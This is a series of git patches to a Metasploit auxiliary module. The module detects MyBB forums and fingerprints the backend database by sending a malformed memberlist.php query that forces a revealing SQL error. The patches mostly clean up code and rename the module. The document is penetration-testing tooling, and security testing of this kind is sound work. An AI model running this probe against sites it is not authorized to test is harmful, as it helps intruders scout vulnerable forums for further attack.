modules/auxiliary/gather/mybb_get_type_db.rb | 54 ++++++++++---------- 1 file changed, 27 insertions(+), 27 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index a61c1166d1..e007166e77 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -36,24 +36,24 @@ class Metasploit3 < Msf::Auxiliary def check begin uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') - nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], - { - 'Msf' => framework, - 'MsfExploit' => self, - }) - req = nclient.request_cgi({ - 'uri' => uri, - 'method' => 'GET',}) - if req.nil? + res = send_request_cgi( + { + 'method' => 'GET', + 'uri' => uri, + 'vars_get' => { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }) + if res.nil? print_error("Failed to retrieve webpage.") return Exploit::CheckCode::Unknown end - if req - res = nclient.send_recv(req, 1024) - else - print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") - return Exploit::CheckCode::Unknown - end + if res.code != 200 print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") return Exploit::CheckCode::Unknown @@ -69,19 +69,19 @@ class Metasploit3 < Msf::Auxiliary end #Check Web-Server - _Version_server = res['Server'] - if _Version_server - _Version_server = " Server Version: #{_Version_server}".ljust(40) + web_server = res['Server'] + if web_server + web_server = " Server Version: #{web_server}".ljust(40) else - _Version_server = " Server Version: unknown".ljust(40) + web_server = " Server Version: unknown".ljust(40) end #Check forum MyBB if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) return Exploit::CheckCode::Detected else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) return Exploit::CheckCode::Unknown end rescue RuntimeError => err @@ -99,12 +99,12 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET', 'uri' => uri, 'vars_get' => { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" } }) if response.nil? From e26dee5e22ba0e7327580da2801f2cc3f913d7ad Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Mon, 19 May 2014 21:32:30 +0400 Subject: [PATCH 12/16] Update mybb_get_type_db.rb 19/05/2014 I deleted - #return Exploit::CheckCode::Unknown # necessary ???? --- modules/auxiliary/gather/mybb_get_type_db.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index e007166e77..b96e7a1a64 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -65,7 +65,6 @@ class Metasploit3 < Msf::Auxiliary php_version = " PHP Version: #{php_version}".ljust(40) else php_version = " PHP Version: unknown".ljust(40) - #return Exploit::CheckCode::Unknown # necessary ???? end #Check Web-Server From eacf70af83e20098efd45178caf901875884b663 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Mon, 26 May 2014 23:26:28 +0400 Subject: [PATCH 13/16] Update mybb_get_type_db.rb 26.05.2014 23:26 I deleted mimicking IE11 --- modules/auxiliary/gather/mybb_get_type_db.rb | 18 ++++-------------- 1 file changed, 4 insertions(+), 14 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index b96e7a1a64..dd8a585a7a 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -35,18 +35,13 @@ class Metasploit3 < Msf::Auxiliary def check begin - uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + uri = normalize_uri(target_uri.path, 'index.php') res = send_request_cgi( { 'method' => 'GET', 'uri' => uri, 'vars_get' => { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + 'intcheck' => 1 } }) if res.nil? @@ -92,18 +87,13 @@ class Metasploit3 < Msf::Auxiliary def run - uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') + uri = normalize_uri(target_uri.path, 'memberlist.php') response = send_request_cgi( { 'method' => 'GET', 'uri' => uri, 'vars_get' => { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + 'letter' => -1 } }) if response.nil? From 1d8c46155bc1b239cedd38953bdc99effbe92500 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 27 May 2014 10:14:55 -0500 Subject: [PATCH 14/16] Do last code cleaning --- modules/auxiliary/gather/mybb_get_type_db.rb | 56 +++++++++----------- 1 file changed, 26 insertions(+), 30 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index dd8a585a7a..f127e03616 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -10,21 +10,17 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Determinant Databases MyBB ', + 'Name' => 'Determinant Databases MyBB ', 'Description' => %q{ - Determine the database in the forum. - This affects versions <= 1.6.12 + This module checks if MyBB is running behind an URL. Also uses a malformed query to + force an error and fingerprint the backend database used by MyBB. }, - 'Author' => + 'Author' => [ #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 - 'Arthur Karmanovskii '#Discovery and Metasploit Module - ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] + 'Arthur Karmanovskii ' # Discovery and Metasploit Module ], + 'License' => MSF_LICENSE, 'DisclosureDate' => 'Feb 13 2014')) register_options( @@ -44,49 +40,49 @@ class Metasploit3 < Msf::Auxiliary 'intcheck' => 1 } }) - if res.nil? - print_error("Failed to retrieve webpage.") - return Exploit::CheckCode::Unknown - end - if res.code != 200 - print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + if res.nil? || res.code != 200 return Exploit::CheckCode::Unknown end #Check PhP php_version = res['X-Powered-By'] if php_version - php_version = " PHP Version: #{php_version}".ljust(40) + php_version = "PHP #{php_version}" else - php_version = " PHP Version: unknown".ljust(40) + php_version = "PHP version unknown" end #Check Web-Server web_server = res['Server'] if web_server - web_server = " Server Version: #{web_server}".ljust(40) + web_server = "#{web_server}" else - web_server = " Server Version: unknown".ljust(40) + web_server = "unknown web server" end #Check forum MyBB if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) + print_good("#{peer} - MyBB forum found running on #{web_server} / #{php_version}") return Exploit::CheckCode::Detected else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) - return Exploit::CheckCode::Unknown - end - rescue RuntimeError => err - print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") return Exploit::CheckCode::Unknown end + rescue + return Exploit::CheckCode::Unknown + end end def run + print_status("#{peer} - Checking MyBB...") + unless check == Exploit::CheckCode::Detected + print_error("#{peer} - MyBB not found") + return + end + + print_status("#{peer} - Checking database...") uri = normalize_uri(target_uri.path, 'memberlist.php') response = send_request_cgi( { @@ -97,17 +93,17 @@ class Metasploit3 < Msf::Auxiliary } }) if response.nil? - print_error("Failed to retrieve webpage.") + print_error("#{peer} - Timeout...") return end #Resolve response if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) - print_good("Database is: PostgreSQL ;)") + print_good("#{peer} - Running PostgreSQL Database") elsif response.body.match(/General error\: 1 no such function\: REGEXP/) - print_good("Database is: SQLite ;)") + print_good("#{peer} - Running SQLite Database") else - print_status("Database MySQL or this is not forum MyBB or unknown Database") + print_status("#{peer} - Running MySQL or unknown database") end end end From b96c2dd0ca38da3feb1bd3af3cf46b8414fe0876 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 27 May 2014 10:15:39 -0500 Subject: [PATCH 15/16] Change module filename --- .../gather/{mybb_get_type_db.rb => mybb_db_fingerprint.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/gather/{mybb_get_type_db.rb => mybb_db_fingerprint.rb} (100%) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb similarity index 100% rename from modules/auxiliary/gather/mybb_get_type_db.rb rename to modules/auxiliary/gather/mybb_db_fingerprint.rb From 86221de10eaa9f012266658199861a924a168265 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 27 May 2014 10:18:27 -0500 Subject: [PATCH 16/16] Fix message --- modules/auxiliary/gather/mybb_db_fingerprint.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/mybb_db_fingerprint.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb index f127e03616..6dbdfeb160 100644 --- a/modules/auxiliary/gather/mybb_db_fingerprint.rb +++ b/modules/auxiliary/gather/mybb_db_fingerprint.rb @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary #Check PhP php_version = res['X-Powered-By'] if php_version - php_version = "PHP #{php_version}" + php_version = "#{php_version}" else php_version = "PHP version unknown" end